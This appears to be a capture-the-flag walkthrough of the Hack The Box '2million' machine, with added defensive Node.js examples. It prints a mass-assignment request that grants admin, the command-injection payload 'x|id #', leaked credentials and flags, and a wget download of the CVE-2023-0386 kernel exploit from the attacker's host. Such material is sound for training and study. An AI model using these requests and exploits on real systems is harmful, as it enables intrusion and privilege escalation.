JS Code Deobfuscation && Unauthorized API Access RCE


Information Gathering

IP Address     Open Ports
10.10.11.221   TCP: 22, 80

$ sudo masscan -p1-65535,U:1-65535 10.10.11.221 --rate=1000 -e tun0 > /tmp/ports
$ ports=$(cat /tmp/ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')
$ nmap -Pn -sV -sC -p$ports 10.10.11.221

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open  http    nginx
|_http-title: Did not follow redirect to http://2million.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

JS Code Deobfuscation && Unauthorized API Access RCE

# echo '10.10.11.221 2million.htb'>>/etc/hosts


$ dirsearch -u http://2million.htb


view-source:http://2million.htb/js/inviteapi.min.js


JavaScript Code Obfuscation Analysis


// Deobfuscated content of /js/inviteapi.min.js: two helpers that POST to the
// invite API. The original minified source had the success callbacks'
// closing braces dropped during extraction; they are restored here.
function verifyInviteCode(code) {
    var formData = { "code": code };
    $.ajax({
        type: "POST",
        dataType: "json",
        data: formData,
        url: '/api/v1/invite/verify',
        success: function(response) {
            console.log(response);
        },
        error: function(response) {
            console.log(response);
        }
    });
}

function makeInviteCode() {
    $.ajax({
        type: "POST",
        dataType: "json",
        url: '/api/v1/invite/generate',
        success: function(response) {
            console.log(response);
        },
        error: function(response) {
            console.log(response);
        }
    });
}


$ echo 'Va beqre gb trarengr gur vaivgr pbqr, znxr n CBFG erdhrfg gb /ncv/i1/vaivgr/trarengr'|tr 'A-Za-z' 'N-ZA-Mn-za-m'


POST /api/v1/invite/generate HTTP/1.1
Host: 2million.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=11hkqh03a638kn4bsphv86bqr2
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 0



DATV8-W1GS1-U5MY1-E43OY


http://2million.htb/home


User API

Method   Route                            Description
GET      /api/v1                          Route list
GET      /api/v1/invite/how/to/generate   Instructions for generating an invite code
GET      /api/v1/invite/generate          Generate an invite code
GET      /api/v1/invite/verify            Verify an invite code
GET      /api/v1/user/auth                Check whether the user is authenticated
GET      /api/v1/user/vpn/generate        Generate a new VPN configuration
GET      /api/v1/user/vpn/regenerate      Regenerate the VPN configuration
GET      /api/v1/user/vpn/download        Download the OVPN file
POST     /api/v1/user/register            Register a new user
POST     /api/v1/user/login               Log in an existing user

Admin API

Method   Route                            Description
GET      /api/v1/admin/auth               Check whether the user is an admin
POST     /api/v1/admin/vpn/generate       Generate a VPN for a specific user
PUT      /api/v1/admin/settings/update    Update user settings

GET /api/v1/user/vpn/download HTTP/1.1

This returns the OpenVPN configuration file.

Checking privileges

Escalating to admin

PUT /api/v1/admin/settings/update HTTP/1.1
Host: 2million.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Referer: http://2million.htb/home/rules
Connection: close
Cookie: PHPSESSID=11hkqh03a638kn4bsphv86bqr2
Upgrade-Insecure-Requests: 1
Content-Length: 47


{
"email":"maptnh@gmail.com",
"is_admin":1
}
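The target's PHP backend is not shown on the page, so as an added example (not the target's code) here is a Node.js sketch with assumed names that reproduces the flaw behind PUT /api/v1/admin/settings/update, a non-admin session setting its own `is_admin`, beside a hardened handler that checks the caller's role and allow-lists writable fields:

```javascript
// Added example, not the target application's code. Handler names, the users
// map and the session shape are assumptions; the sample users are constructed.
function makeUsers() {
  return new Map([
    ['admin', { is_admin: 1, theme: 'dark' }],
    ['maptnh@gmail.com', { is_admin: 0, theme: 'dark' }],
  ]);
}

// Vulnerable shape: any logged-in session may reach the route, and every
// client-supplied field is copied onto the record (mass assignment), so the
// client decides the value of is_admin.
function updateSettingsVulnerable(users, session, body) {
  if (!session.loggedIn) return { status: 401 };
  const target = users.get(body.email);
  if (!target) return { status: 404 };
  Object.assign(target, body);
  return { status: 200, user: target };
}

// Hardened shape: (1) the caller must already be an admin, (2) only an explicit
// allow-list of fields is writable, and (3) unknown fields are rejected loudly
// rather than silently dropped, so probing shows up as 400s in the logs.
const WRITABLE_FIELDS = new Set(['theme']);

function updateSettingsHardened(users, session, body) {
  if (!session.loggedIn) return { status: 401 };
  const caller = users.get(session.email);
  if (!caller || caller.is_admin !== 1) return { status: 403 };
  const target = users.get(body.email);
  if (!target) return { status: 404 };
  const rejected = Object.keys(body).filter(
    (k) => k !== 'email' && !WRITABLE_FIELDS.has(k),
  );
  if (rejected.length) return { status: 400, rejected };
  for (const k of WRITABLE_FIELDS) if (k in body) target[k] = body[k];
  return { status: 200, user: target };
}
```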


POST /api/v1/admin/vpn/generate HTTP/1.1
Host: 2million.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Referer: http://2million.htb/home/rules
Connection: close
Cookie: PHPSESSID=11hkqh03a638kn4bsphv86bqr2
Upgrade-Insecure-Requests: 1
Content-Length: 35


{
"username":"maptnh@gmail.com"
}


{
"username":"x|id #"
}
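The `x|id #` payload works because the `username` field ends up inside a shell command string. As an added example (not the target's code; the script path and function names are assumptions), the vulnerable string-building shape next to a hardened one that validates the value against the legitimate e-mail-shaped usernames and passes it as a single argv element without a shell:

```javascript
// Added example, not the target application's code. The gen_vpn.sh path and the
// function names are assumptions used only to illustrate the two shapes.

// Vulnerable shape: the username is spliced into a shell command. A value such
// as 'x|id #' terminates the intended command and runs 'id' instead.
function buildShellCommandVulnerable(username) {
  return `/opt/scripts/gen_vpn.sh ${username}`;
}

// Hardened step 1: allow-list the legitimate value space. Usernames on this
// site are e-mail addresses, so shell metacharacters never need to be accepted.
const USERNAME_RE = /^[A-Za-z0-9._+-]{1,64}(@[A-Za-z0-9.-]{1,255})?$/;

function validateUsername(username) {
  if (typeof username !== 'string' || !USERNAME_RE.test(username)) return null;
  if (username.startsWith('-')) return null; // would be parsed as an option
  return username;
}

// Hardened step 2: build argv for execFile (no shell), so even a value that
// slips past validation is one argument, not a command. '--' ends option parsing.
function buildArgvHardened(username) {
  const safe = validateUsername(username);
  if (safe === null) throw new Error('invalid username');
  return { file: '/opt/scripts/gen_vpn.sh', args: ['--', safe] };
}

async function generateVpn(username) {
  const { file, args } = buildArgvHardened(username);
  const { execFile } = await import('node:child_process');
  return new Promise((resolve, reject) =>
    execFile(file, args, { timeout: 5000 }, (err, stdout) =>
      err ? reject(err) : resolve(stdout)));
}
```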


username:admin
password:SuperDuperPass123

$ ssh admin@10.10.11.221


User.txt

6a9c99994e4334df9edc1fc13bca997b

Privilege Escalation: OverlayFS

There is an email in /var/spool/mail/admin

From: ch4p <ch4p@2million.htb>
To: admin <admin@2million.htb>
Cc: g0blin <g0blin@2million.htb>
Subject: Urgent: Patch System OS
Date: Tue, 1 June 2023 10:45:22 -0700
Message-ID: <9876543210@2million.htb>
X-Mailer: ThunderMail Pro 5.2

Hey admin,

I'm aware you're working as fast as you can to complete the DB migration. While we're partially down, can you also upgrade the OS on our web host? There have been a few serious Linux kernel CVEs already this year. That one in OverlayFS / FUSE looks nasty. We can't be compromised by that.

HTB Godfather

The email points at the OverlayFS / FUSE vulnerability, CVE-2023-0386.

$ git clone https://github.com/puckiestyle/CVE-2023-0386.git

$ tar -czvf CVE-2023-0386.tar.gz ./CVE-2023-0386

admin@2million:/tmp$ wget http://10.10.16.16/CVE-2023-0386.tar.gz

admin@2million:/tmp$ tar -zxvf CVE-2023-0386.tar.gz

admin@2million:/tmp/CVE-2023-0386$ make all

admin@2million:/tmp/CVE-2023-0386$ ./fuse ./ovlcap/lower ./gc

admin@2million:/tmp/CVE-2023-0386$ ./exp

Root.txt

35ed55b48c40b4a093970f40eda0281c
